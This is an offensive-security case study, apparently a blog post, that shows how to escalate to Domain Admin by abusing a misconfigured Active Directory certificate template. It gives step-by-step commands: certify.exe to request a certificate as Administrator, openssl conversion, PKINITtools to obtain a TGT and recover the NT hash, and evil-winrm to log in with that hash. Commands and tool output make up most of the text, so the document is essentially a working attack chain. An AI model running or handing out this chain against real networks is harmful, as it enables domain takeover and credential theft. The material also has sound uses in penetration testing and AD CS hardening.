Case Study - Certificate Template to Domain Admin the Linux Way
intro
Misconfigured certificate template can be used for privilege escalation purpose. There is a good article on this topic here. This case study provides an alternative approach on linux. Original study: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin
Common steps
As shown in the article above, vulnerability can be checked using certify.exe
> certify.exe find /vulnerable
# keep a note on this property
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
Then, the tool can be used to request for a certificate on behalf of a high privilege user, eg Administrator
> certify.exe request /ca:<CA Name> /template:<Tempate Name> /altname:Administrator
As explained, the certificate needs to be converted to .pfx format
> openssl pkcs12 -in cert.pem -keyex -CSP "comment" -export -out cert.pfx
The linux way
From this point onward, we can switch to the linux context and carry on. We will use a tool called PKINITtools
First, we create a TGT using the .pfx certificate. This will generate a AS-REP encryption key, keep this for later use
> python3 PKINITtools/gettgtpkinit.py -cert-pfx cert.pfx -dc-ip <dc-ip> <domain>/Administrator <ccache_file>
2023-02-27 01:16:19,092 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-02-27 01:16:19,245 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-02-27 01:16:27,755 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-02-27 01:16:27,756 minikerberos INFO <key>
INFO:minikerberos:<key>
2023-02-27 01:16:27,768 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
- Setup ccache for auth purpose
> export KRB5CCNAME=<ccache_file>
- Next, we generate a NTLM hash using the TGT
# <key> is generated from last step
> python3 PKINITtools/getnthash.py <domain>/Administrator -k <key>
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
<hash>
- Finally, we can use the hash to login to the target
> evil-winrm -u Administrator -i <domain> -H <hash>